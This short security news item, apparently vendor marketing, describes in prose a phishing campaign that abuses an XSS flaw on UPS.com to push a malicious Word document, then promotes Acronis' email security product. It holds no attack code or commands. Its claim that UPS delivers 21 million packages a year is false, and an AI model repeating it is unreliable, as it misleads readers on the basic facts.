Phishing campaign utilizes UPS website vulnerability

A brand-new phishing campaign sees attackers sending out emails disguised as official UPS communications. These messages utilize an XSS vulnerability on UPS.com to appear remarkably legitimate.

UPS delivers more than 21 million packages a year and has over 26 percent of the parcel service market share, making this campaign an effective way to target inboxes.

All links in the phishing emails are legitimate, except for the tracking number. When clicked, victims are taken to the UPS website, where a malicious JavaScript injection causes the page to display an innocuous-looking message informing users that a file will be downloaded. This file is actually a malicious Word document that ultimately delivers an additional payload.

Attacks like this demonstrate how crafty attackers can be, and how tricky it can be to determine whether a file or message is truly safe. Acronis' Advanced Email Security pack brings cyber protection to email inboxes, using advanced heuristics to filter out messages with malicious links and attachments before they can ever be opened.